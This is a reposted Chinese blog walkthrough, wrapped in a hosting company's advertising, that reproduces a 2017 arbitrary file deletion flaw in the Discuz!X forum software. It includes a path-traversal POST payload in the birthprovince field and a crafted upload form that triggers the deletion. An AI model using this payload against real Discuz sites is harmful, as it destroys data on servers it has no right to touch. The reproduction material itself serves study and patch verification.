Discuz!X前台任意文件删除漏洞重现-创新互联

漏洞背景:
Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。

十载专注成都网站制作,企业网站设计,个人网站制作服务,为大家分享网站制作知识、方案,网站设计流程、步骤,成功服务上千家企业。为您提供网站建设,网站制作,网页设计及定制高端网站建设服务,专注于企业网站设计,高端网页制作,对混凝土搅拌机等多个行业,拥有丰富的营销推广经验。

2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。

2017年9月29日,知道创宇404 实验室开始应急,经过知道创宇404实验室分析确认,该漏洞于2014年6月被提交到 Wooyun漏洞平台,Seebug漏洞平台收录了该漏洞,漏洞编号 ssvid-93588。该漏洞通过配置属性值,导致任意文件删除。

经过分析确认,原有的利用方式已经被修复,添加了对属性的 formtype 判断,但修复方式不完全导致可以绕过,通过模拟文件上传可以进入其他 unlink 条件,实现任意文件删除漏洞。

漏洞复现:
1.进入设置-个人资料,先在页面源代码找到formhash值,可以看到值为2599b5e5
Discuz!X前台任意文件删除漏洞重现
2.开启一个插件Hackbar
Post数据:birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5
Discuz!X前台任意文件删除漏洞重现
执行后会显示一片空白,你再刷新下或重新访问下就好了。
Discuz!X前台任意文件删除漏洞重现
Discuz!X前台任意文件删除漏洞重现
3.出生地被修改成要删除的文件。
最后构造表单执行删除文件
action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">





Discuz!X前台任意文件删除漏洞重现
生成.html,上面的需要自己修改。
4.然后随便上传一张图片,就能删除自己要删除的。
Discuz!X前台任意文件删除漏洞重现
5.再访问回去看一下。
Discuz!X前台任意文件删除漏洞重现
复现成功。

另外有需要云服务器可以了解下创新互联cdcxhl.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


分享文章:Discuz!X前台任意文件删除漏洞重现-创新互联
标题URL:http://scyanting.com/article/ejspj.html